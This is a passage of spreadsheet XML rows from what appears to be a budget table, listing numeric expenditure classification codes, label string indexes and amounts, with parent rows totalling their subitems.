      <c r="C60" s="494">
        <v>490</v>
      </c>
    </row>
    <row r="61" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A61" s="491">
        <v>20402</v>
      </c>
      <c r="B61" s="492" t="s">
        <v>606</v>
      </c>
      <c r="C61" s="493">
        <v>7224</v>
      </c>
    </row>
    <row r="62" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A62" s="491">
        <v>2040201</v>
      </c>
      <c r="B62" s="491" t="s">
        <v>561</v>
      </c>
      <c r="C62" s="494">
        <v>3632</v>
      </c>
    </row>
    <row r="63" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A63" s="491">
        <v>2040220</v>
      </c>
      <c r="B63" s="491" t="s">
        <v>607</v>
      </c>
      <c r="C63" s="494">
        <v>2946</v>
      </c>
    </row>
    <row r="64" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A64" s="491">
        <v>2040299</v>
      </c>
      <c r="B64" s="491" t="s">
        <v>608</v>
      </c>
      <c r="C64" s="494">
        <v>646</v>
      </c>
    </row>
    <row r="65" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A65" s="491">
        <v>20406</v>
      </c>
      <c r="B65" s="492" t="s">
        <v>609</v>
      </c>
      <c r="C65" s="493">
        <v>270</v>
      </c>
    </row>
    <row r="66" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A66" s="491">
        <v>2040604</v>
      </c>
      <c r="B66" s="491" t="s">
        <v>610</v>
      </c>
      <c r="C66" s="494">
        <v>150</v>
      </c>
    </row>
    <row r="67" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A67" s="491">
        <v>2040607</v>
      </c>
      <c r="B67" s="491" t="s">
        <v>611</v>
      </c>
      <c r="C67" s="494">
        <v>100</v>
      </c>
    </row>
    <row r="68" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A68" s="491">
        <v>2040699</v>
      </c>
      <c r="B68" s="491" t="s">
        <v>612</v>
      </c>
      <c r="C68" s="494">
        <v>20</v>
      </c>
    </row>
    <row r="69" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A69" s="491">
        <v>20499</v>
      </c>
      <c r="B69" s="492" t="s">
        <v>613</v>
      </c>
      <c r="C69" s="493">
        <v>1000</v>
      </c>
    </row>
    <row r="70" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A70" s="491">
        <v>2049999</v>
      </c>
      <c r="B70" s="491" t="s">
        <v>614</v>
      </c>
      <c r="C70" s="494">
        <v>1000</v>
      </c>
    </row>
    <row r="71" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A71" s="491">
        <v>205</v>
      </c>
      <c r="B71" s="492" t="s">
        <v>615</v>
      </c>
      <c r="C71" s="493">
        <v>46546</v>
      </c>
    </row>
    <row r="72" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A72" s="491">
        <v>20501</v>
      </c>
      <c r="B72" s="492" t="s">
        <v>616</v>
      </c>
      <c r="C72" s="493">
        <v>2597</v>
      </c>
    </row>
    <row r="73" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A73" s="491">
        <v>2050101</v>
      </c>
      <c r="B73" s="491" t="s">
        <v>561</v>
      </c>
      <c r="C73" s="494">
        <v>1897</v>
      </c>
    </row>
    <row r="74" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A74" s="491">
        <v>2050199</v>
      </c>
      <c r="B74" s="491" t="s">
        <v>617</v>
      </c>
      <c r="C74" s="494">
        <v>700</v>
      </c>
    </row>
    <row r="75" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A75" s="491">
        <v>20502</v>
      </c>
      <c r="B75" s="492" t="s">
        <v>618</v>
      </c>
      <c r="C75" s="493">
        <v>43641</v>
      </c>
    </row>
    <row r="76" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A76" s="491">
        <v>2050201</v>
      </c>
      <c r="B76" s="491" t="s">
        <v>619</v>
      </c>
      <c r="C76" s="494">
        <v>2624</v>
      </c>
    </row>
    <row r="77" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A77" s="491">
        <v>2050202</v>
      </c>
      <c r="B77" s="491" t="s">
        <v>620</v>
      </c>
      <c r="C77" s="494">
        <v>19389</v>
      </c>
    </row>
    <row r="78" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A78" s="491">
        <v>2050203</v>
      </c>
      <c r="B78" s="491" t="s">
        <v>621</v>
      </c>
      <c r="C78" s="494">
        <v>19675</v>
      </c>
    </row>
    <row r="79" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A79" s="491">
        <v>2050299</v>
      </c>
      <c r="B79" s="491" t="s">
        <v>622</v>
      </c>
      <c r="C79" s="494">
        <v>1953</v>
      </c>
    </row>
    <row r="80" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A80" s="491">
        <v>20503</v>
      </c>
      <c r="B80" s="492" t="s">
        <v>623</v>
      </c>
      <c r="C80" s="493">
        <v>108</v>
      </c>
    </row>
    <row r="81" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A81" s="491">
        <v>2050302</v>
      </c>
      <c r="B81" s="491" t="s">
        <v>624</v>
      </c>
      <c r="C81" s="494">
        <v>108</v>
      </c>
    </row>
    <row r="82" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A82" s="491">
        <v>20599</v>
      </c>
      <c r="B82" s="492" t="s">
        <v>625</v>
      </c>
      <c r="C82" s="493">
        <v>200</v>
      </c>
    </row>
    <row r="83" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A83" s="491">
        <v>2059999</v>
      </c>
      <c r="B83" s="491" t="s">
        <v>626</v>
      </c>
      <c r="C83" s="494">
        <v>200</v>
      </c>
    </row>
    <row r="84" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A84" s="491">
        <v>206</v>
      </c>
      <c r="B84" s="492" t="s">
        <v>627</v>
      </c>
      <c r="C84" s="493">
        <v>6645</v>
      </c>
    </row>
    <row r="85" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A85" s="491">
        <v>20601</v>
      </c>
      <c r="B85" s="492" t="s">
        <v>628</v>
      </c>
      <c r="C85" s="493">
        <v>2445</v>
      </c>
    </row>
    <row r="86" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A86" s="491">
        <v>2060101</v>
      </c>
      <c r="B86" s="491" t="s">
        <v>561</v>
      </c>
      <c r="C86" s="494">
        <v>1349</v>
      </c>
    </row>
    <row r="87" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A87" s="491">
        <v>2060199</v>
      </c>
      <c r="B87" s="491" t="s">
        <v>629</v>
      </c>
      <c r="C87" s="494">
        <v>1096</v>
      </c>
    </row>
    <row r="88" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A88" s="491">
        <v>20604</v>
      </c>
      <c r="B88" s="492" t="s">
        <v>630</v>
      </c>
      <c r="C88" s="493">
        <v>500</v>
      </c>
    </row>
    <row r="89" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A89" s="491">
        <v>2060499</v>
      </c>
      <c r="B89" s="491" t="s">
        <v>631</v>
      </c>
      <c r="C89" s="494">
        <v>500</v>
      </c>
    </row>
    <row r="90" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A90" s="491">
        <v>20607</v>
      </c>
      <c r="B90" s="492" t="s">
        <v>632</v>
      </c>
      <c r="C90" s="493">
        <v>500</v>
      </c>
    </row>
    <row r="91" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A91" s="491">
        <v>2060799</v>
      </c>
      <c r="B91" s="491" t="s">
        <v>633</v>
      </c>
      <c r="C91" s="494">
        <v>500</v>
      </c>
    </row>
    <row r="92" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A92" s="491">
        <v>20609</v>
      </c>
      <c r="B92" s="492" t="s">
        <v>634</v>
      </c>
      <c r="C92" s="493">
        <v>900</v>
      </c>
    </row>
    <row r="93" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A93" s="491">
        <v>2060999</v>
      </c>
      <c r="B93" s="491" t="s">
        <v>635</v>
      </c>
      <c r="C93" s="494">
        <v>900</v>
      </c>
    </row>
    <row r="94" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A94" s="491">
        <v>20699</v>
      </c>
      <c r="B94" s="492" t="s">
        <v>636</v>
      </c>
      <c r="C94" s="493">
        <v>2300</v>
      </c>
    </row>
    <row r="95" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A95" s="491">
        <v>2069999</v>
      </c>
      <c r="B95" s="491" t="s">
        <v>637</v>
      </c>
      <c r="C95" s="494">
        <v>2300</v>
      </c>
    </row>
    <row r="96" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A96" s="491">
        <v>207</v>
      </c>
      <c r="B96" s="492" t="s">
        <v>638</v>
      </c>
      <c r="C96" s="493">
        <v>367</v>
      </c>
    </row>
    <row r="97" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A97" s="491">
        <v>20701</v>
      </c>
      <c r="B97" s="492" t="s">
        <v>639</v>
      </c>
      <c r="C97" s="493">
        <v>332</v>
      </c>
    </row>
    <row r="98" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A98" s="491">
        <v>2070104</v>
      </c>
      <c r="B98" s="491" t="s">
        <v>640</v>
      </c>
      <c r="C98" s="494">
        <v>104</v>
      </c>
    </row>
    <row r="99" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A99" s="491">
        <v>2070109</v>
      </c>
      <c r="B99" s="491" t="s">
        <v>641</v>
      </c>
      <c r="C99" s="494">
        <v>108</v>
      </c>
    </row>
    <row r="100" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A100" s="491">
        <v>2070199</v>
      </c>
      <c r="B100" s="491" t="s">
        <v>642</v>
      </c>
      <c r="C100" s="494">
        <v>120</v>
      </c>
    </row>
    <row r="101" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A101" s="491">
        <v>20703</v>
      </c>
      <c r="B101" s="492" t="s">
        <v>643</v>
      </c>
      <c r="C101" s="493">
        <v>30</v>
      </c>
    </row>
    <row r="102" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A102" s="491">
        <v>2070305</v>
      </c>
      <c r="B102" s="491" t="s">
        <v>644</v>
      </c>
      <c r="C102" s="494">
        <v>30</v>
      </c>
    </row>
    <row r="103" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A103" s="491">
        <v>20706</v>
      </c>
      <c r="B103" s="492" t="s">
        <v>645</v>
      </c>
      <c r="C103" s="493">
        <v>5</v>
      </c>
    </row>
    <row r="104" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A104" s="491">
        <v>2070607</v>
      </c>
      <c r="B104" s="491" t="s">
        <v>646</v>
      </c>
      <c r="C104" s="494">
        <v>5</v>
      </c>
    </row>
    <row r="105" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A105" s="491">
        <v>208</v>
      </c>
      <c r="B105" s="492" t="s">
        <v>647</v>
      </c>
      <c r="C105" s="493">
        <v>22098</v>
      </c>
    </row>
    <row r="106" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A106" s="491">
        <v>20801</v>
      </c>
      <c r="B106" s="492" t="s">
        <v>648</v>
      </c>
      <c r="C106" s="493">
        <v>1457</v>
      </c>
    </row>
    <row r="107" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A107" s="491">
        <v>2080101</v>
      </c>
      <c r="B107" s="491" t="s">
        <v>561</v>
      </c>
      <c r="C107" s="494">
        <v>302</v>
      </c>
    </row>
    <row r="108" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A108" s="491">
        <v>2080108</v>
      </c>
      <c r="B108" s="491" t="s">
        <v>571</v>
      </c>
      <c r="C108" s="494">
        <v>65</v>
      </c>
    </row>
    <row r="109" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A109" s="491">
        <v>2080116</v>
      </c>
      <c r="B109" s="491" t="s">
        <v>649</v>
      </c>
      <c r="C109" s="494">
        <v>810</v>
      </c>
    </row>
    <row r="110" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A110" s="491">
        <v>2080199</v>
      </c>
      <c r="B110" s="491" t="s">
        <v>650</v>
      </c>
      <c r="C110" s="494">
        <v>280</v>
      </c>
    </row>
    <row r="111" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A111" s="491">
        <v>20802</v>
      </c>
      <c r="B111" s="492" t="s">
        <v>651</v>
      </c>
      <c r="C111" s="493">
        <v>4288</v>
      </c>
    </row>
    <row r="112" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A112" s="491">
        <v>2080201</v>
      </c>
      <c r="B112" s="491" t="s">
        <v>561</v>
      </c>
      <c r="C112" s="494">
        <v>2</v>
      </c>
    </row>
    <row r="113" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A113" s="491">
        <v>2080206</v>
      </c>
      <c r="B113" s="491" t="s">
        <v>652</v>
      </c>
      <c r="C113" s="494">
        <v>4</v>
      </c>
    </row>
    <row r="114" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A114" s="491">
        <v>2080208</v>
      </c>
      <c r="B114" s="491" t="s">
        <v>653</v>
      </c>
      <c r="C114" s="494">
        <v>4247</v>
      </c>
    </row>
    <row r="115" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A115" s="491">
        <v>2080299</v>
      </c>
      <c r="B115" s="491" t="s">
        <v>654</v>
      </c>
      <c r="C115" s="494">
        <v>35</v>
      </c>
    </row>
    <row r="116" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A116" s="491">
        <v>20805</v>
      </c>
      <c r="B116" s="492" t="s">
        <v>655</v>
      </c>
      <c r="C116" s="493">
        <v>6648</v>
      </c>
    </row>
    <row r="117" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A117" s="491">
        <v>2080501</v>
      </c>
      <c r="B117" s="491" t="s">
        <v>656</v>
      </c>
      <c r="C117" s="494">
        <v>1955</v>
      </c>
    </row>
    <row r="118" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A118" s="491">
        <v>2080502</v>
      </c>
      <c r="B118" s="491" t="s">
        <v>657</v>
      </c>
      <c r="C118" s="494">
        <v>1208</v>
      </c>
    </row>
    <row r="119" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A119" s="491">
        <v>2080505</v>
      </c>
      <c r="B119" s="491" t="s">
        <v>658</v>
      </c>
      <c r="C119" s="494">
        <v>2885</v>
      </c>
    </row>
    <row r="120" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A120" s="491">
        <v>2080506</v>
      </c>
      <c r="B120" s="491" t="s">
        <v>659</v>
      </c>
      <c r="C120" s="494">
        <v>600</v>
      </c>
    </row>
    <row r="121" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A121" s="491">
        <v>20807</v>
      </c>
      <c r="B121" s="492" t="s">
        <v>660</v>
      </c>
      <c r="C121" s="493">
        <v>1431</v>
      </c>
    </row>
    <row r="122" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A122" s="491">
        <v>2080705</v>
      </c>
      <c r="B122" s="491" t="s">
        <v>661</v>
      </c>
      <c r="C122" s="494">
        <v>37</v>
      </c>
    </row>
    <row r="123" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A123" s="491">
        <v>2080799</v>
      </c>
      <c r="B123" s="491" t="s">
        <v>662</v>
      </c>
      <c r="C123" s="494">
        <v>1394</v>
      </c>
    </row>
    <row r="124" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A124" s="491">
        <v>20808</v>
      </c>
      <c r="B124" s="492" t="s">
        <v>663</v>
      </c>
      <c r="C124" s="493">
        <v>2635</v>
      </c>
    </row>
    <row r="125" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A125" s="491">
        <v>2080802</v>
      </c>
      <c r="B125" s="491" t="s">
        <v>664</v>
      </c>
      <c r="C125" s="494">
        <v>1874</v>
      </c>
    </row>
    <row r="126" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A126" s="491">
        <v>2080805</v>
      </c>
      <c r="B126" s="491" t="s">
        <v>665</v>
      </c>
      <c r="C126" s="494">
        <v>127</v>
      </c>
    </row>
    <row r="127" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A127" s="491">
        <v>2080899</v>
      </c>
      <c r="B127" s="491" t="s">
        <v>666</v>
      </c>
      <c r="C127" s="494">
        <v>634</v>
      </c>
    </row>
    <row r="128" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A128" s="491">
        <v>20809</v>
      </c>
      <c r="B128" s="492" t="s">
        <v>667</v>
      </c>
      <c r="C128" s="493">
        <v>303</v>
      </c>
    </row>
    <row r="129" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A129" s="491">
        <v>2080901</v>
      </c>
      <c r="B129" s="491" t="s">
        <v>668</v>
      </c>
      <c r="C129" s="494">
        <v>281</v>
      </c>
    </row>
    <row r="130" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A130" s="491">
        <v>2080999</v>
      </c>
      <c r="B130" s="491" t="s">
        <v>669</v>
      </c>
      <c r="C130" s="494">
        <v>22</v>
      </c>
    </row>
    <row r="131" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A131" s="491">
        <v>20810</v>
      </c>
      <c r="B131" s="492" t="s">
        <v>670</v>
      </c>
      <c r="C131" s="493">
        <v>609</v>
      </c>
    </row>
    <row r="132" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A132" s="491">
        <v>2081001</v>
      </c>
      <c r="B132" s="491" t="s">
        <v>671</v>
      </c>
      <c r="C132" s="494">
        <v>43</v>
      </c>
    </row>
    <row r="133" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A133" s="491">
        <v>2081002</v>
      </c>
      <c r="B133" s="491" t="s">
        <v>672</v>
      </c>
      <c r="C133" s="494">
        <v>341</v>
      </c>
    </row>
    <row r="134" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A134" s="491">
        <v>2081004</v>
      </c>
      <c r="B134" s="491" t="s">
        <v>673</v>
      </c>
      <c r="C134" s="494">
        <v>74</v>
      </c>
    </row>
    <row r="135" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A135" s="491">
        <v>2081006</v>
      </c>
      <c r="B135" s="491" t="s">
        <v>674</v>
      </c>
      <c r="C135" s="494">
        <v>102</v>
      </c>
    </row>
    <row r="136" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A136" s="491">
        <v>2081099</v>
      </c>
      <c r="B136" s="491" t="s">
        <v>675</v>
      </c>
      <c r="C136" s="494">
        <v>49</v>
      </c>
    </row>
    <row r="137" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A137" s="491">
        <v>20811</v>
      </c>
      <c r="B137" s="492" t="s">
        <v>676</v>
      </c>
      <c r="C137" s="493">
        <v>667</v>
      </c>
    </row>
    <row r="138" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A138" s="491">
        <v>2081104</v>
      </c>
      <c r="B138" s="491" t="s">
        <v>677</v>
      </c>
      <c r="C138" s="494">
        <v>2</v>
      </c>
    </row>
    <row r="139" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A139" s="491">
        <v>2081107</v>
      </c>
      <c r="B139" s="491" t="s">
        <v>678</v>
      </c>
      <c r="C139" s="494">
        <v>500</v>
      </c>
    </row>
    <row r="140" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A140" s="491">
        <v>2081199</v>
      </c>
      <c r="B140" s="491" t="s">
        <v>679</v>
      </c>
      <c r="C140" s="494">
        <v>165</v>
      </c>
    </row>
    <row r="141" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A141" s="491">
        <v>20819</v>
      </c>
      <c r="B141" s="492" t="s">
        <v>680</v>
      </c>
      <c r="C141" s="493">
        <v>408</v>
      </c>
    </row>
    <row r="142" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A142" s="491">
        <v>2081901</v>
      </c>
      <c r="B142" s="491" t="s">
        <v>681</v>
      </c>
      <c r="C142" s="494">
        <v>115</v>
      </c>
    </row>
    <row r="143" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A143" s="491">
        <v>2081902</v>
      </c>
      <c r="B143" s="491" t="s">
        <v>682</v>
      </c>
      <c r="C143" s="494">
        <v>293</v>
      </c>
    </row>
    <row r="144" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A144" s="491">
        <v>20820</v>
      </c>
      <c r="B144" s="492" t="s">
        <v>683</v>
      </c>
      <c r="C144" s="493">
        <v>50</v>
      </c>
    </row>
    <row r="145" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A145" s="491">
        <v>2082001</v>
      </c>
      <c r="B145" s="491" t="s">
        <v>684</v>
      </c>
      <c r="C145" s="494">
        <v>50</v>
      </c>
    </row>
    <row r="146" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A146" s="491">
        <v>20821</v>
      </c>
      <c r="B146" s="492" t="s">
        <v>685</v>
      </c>
      <c r="C146" s="493">
        <v>154</v>
      </c>
    </row>
    <row r="147" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A147" s="491">
        <v>2082101</v>
      </c>
      <c r="B147" s="491" t="s">
        <v>686</v>
      </c>
      <c r="C147" s="494">
        <v>40</v>
      </c>
    </row>
    <row r="148" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A148" s="491">
        <v>2082102</v>
      </c>
      <c r="B148" s="491" t="s">
        <v>687</v>
      </c>
      <c r="C148" s="494">
        <v>114</v>
      </c>
    </row>
    <row r="149" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A149" s="491">
        <v>20825</v>
      </c>
      <c r="B149" s="492" t="s">
        <v>688</v>
      </c>
      <c r="C149" s="493">
        <v>10</v>
      </c>
    </row>
    <row r="150" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A150" s="491">
        <v>2082502</v>
      </c>
      <c r="B150" s="491" t="s">
        <v>689</v>
      </c>
      <c r="C150" s="494">
        <v>10</v>
      </c>
    </row>
    <row r="151" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A151" s="491">
        <v>20826</v>
      </c>
      <c r="B151" s="492" t="s">
        <v>690</v>
      </c>
      <c r="C151" s="493">
        <v>2393</v>
      </c>
    </row>
    <row r="152" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A152" s="491">
        <v>2082601</v>
      </c>
      <c r="B152" s="491" t="s">
        <v>691</v>
      </c>
      <c r="C152" s="494">
        <v>805</v>
      </c>
    </row>
    <row r="153" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A153" s="491">
        <v>2082602</v>
      </c>
      <c r="B153" s="491" t="s">
        <v>692</v>
      </c>
      <c r="C153" s="494">
        <v>1408</v>
      </c>
    </row>
    <row r="154" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A154" s="491">
        <v>2082699</v>
      </c>
      <c r="B154" s="491" t="s">
        <v>693</v>
      </c>
      <c r="C154" s="494">
        <v>180</v>
      </c>
    </row>
    <row r="155" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A155" s="491">
        <v>20828</v>
      </c>
      <c r="B155" s="492" t="s">
        <v>694</v>
      </c>
      <c r="C155" s="493">
        <v>8</v>
      </c>
    </row>
    <row r="156" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A156" s="491">
        <v>2082801</v>
      </c>
      <c r="B156" s="491" t="s">
        <v>561</v>
      </c>
      <c r="C156" s="494">
        <v>8</v>
      </c>
    </row>
    <row r="157" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A157" s="491">
        <v>20899</v>
      </c>
      <c r="B157" s="492" t="s">
        <v>695</v>
      </c>
      <c r="C157" s="493">
        <v>1039</v>
      </c>
    </row>
    <row r="158" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A158" s="491">
        <v>2089999</v>
      </c>
      <c r="B158" s="491" t="s">
        <v>696</v>
      </c>
      <c r="C158" s="494">
        <v>1039</v>
      </c>
    </row>
    <row r="159" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A159" s="491">
        <v>210</v>
      </c>
      <c r="B159" s="492" t="s">
        <v>697</v>
      </c>
      <c r="C159" s="493">
        <v>18408</v>
      </c>
    </row>
    <row r="160" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A160" s="491">
        <v>21001</v>
      </c>
      <c r="B160" s="492" t="s">
        <v>698</v>
      </c>
      <c r="C160" s="493">
        <v>222</v>
      </c>
    </row>
    <row r="161" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A161" s="491">
        <v>2100101</v>
      </c>
      <c r="B161" s="491" t="s">
        <v>561</v>
      </c>
      <c r="C161" s="494">
        <v>188</v>
      </c>
    </row>
    <row r="162" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A162" s="491">
        <v>2100199</v>
      </c>
      <c r="B162" s="491" t="s">
        <v>699</v>
      </c>
      <c r="C162" s="494">
        <v>34</v>
      </c>
    </row>
    <row r="163" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A163" s="491">
        <v>21003</v>
      </c>
      <c r="B163" s="492" t="s">
        <v>700</v>
      </c>
      <c r="C163" s="493">
        <v>2109</v>
      </c>
    </row>
    <row r="164" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A164" s="491">
        <v>2100302</v>
      </c>
      <c r="B164" s="491" t="s">
        <v>701</v>
      </c>
      <c r="C164" s="494">
        <v>1700</v>
      </c>
    </row>
    <row r="165" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A165" s="491">
        <v>2100399</v>
      </c>
      <c r="B165" s="491" t="s">
        <v>702</v>
      </c>
      <c r="C165" s="494">
        <v>409</v>
      </c>
    </row>
    <row r="166" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A166" s="491">
        <v>21004</v>
      </c>
      <c r="B166" s="492" t="s">
        <v>703</v>
      </c>
      <c r="C166" s="493">
        <v>4601</v>
      </c>
    </row>
    <row r="167" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A167" s="491">
        <v>2100401</v>
      </c>
      <c r="B167" s="491" t="s">
        <v>704</v>
      </c>
      <c r="C167" s="494">
        <v>25</v>
      </c>
    </row>
    <row r="168" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A168" s="491">
        <v>2100408</v>
      </c>
      <c r="B168" s="491" t="s">
        <v>705</v>
      </c>
      <c r="C168" s="494">
        <v>2673</v>
      </c>
    </row>
    <row r="169" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A169" s="491">
        <v>2100409</v>
      </c>
      <c r="B169" s="491" t="s">
        <v>706</v>
      </c>
      <c r="C169" s="494">
        <v>191</v>
      </c>
    </row>
    <row r="170" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A170" s="491">
        <v>2100410</v>
      </c>
      <c r="B170" s="491" t="s">
        <v>707</v>
      </c>
      <c r="C170" s="494">
        <v>1400</v>
      </c>
    </row>
    <row r="171" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A171" s="491">
        <v>2100499</v>
      </c>
      <c r="B171" s="491" t="s">
        <v>708</v>
      </c>
      <c r="C171" s="494">
        <v>312</v>
      </c>
    </row>
    <row r="172" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A172" s="491">
        <v>21006</v>
      </c>
      <c r="B172" s="492" t="s">
        <v>709</v>
      </c>
      <c r="C172" s="493">
        <v>20</v>
      </c>
    </row>
    <row r="173" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A173" s="491">
        <v>2100699</v>
      </c>
      <c r="B173" s="491" t="s">
        <v>710</v>
      </c>
      <c r="C173" s="494">
        <v>20</v>
      </c>
    </row>
    <row r="174" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A174" s="491">
        <v>21007</v>
      </c>
      <c r="B174" s="492" t="s">
        <v>711</v>
      </c>
      <c r="C174" s="493">
        <v>1774</v>
      </c>
    </row>
    <row r="175" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A175" s="491">
        <v>2100717</v>
      </c>
      <c r="B175" s="491" t="s">
        <v>712</v>
      </c>
      <c r="C175" s="494">
        <v>680</v>
      </c>
    </row>
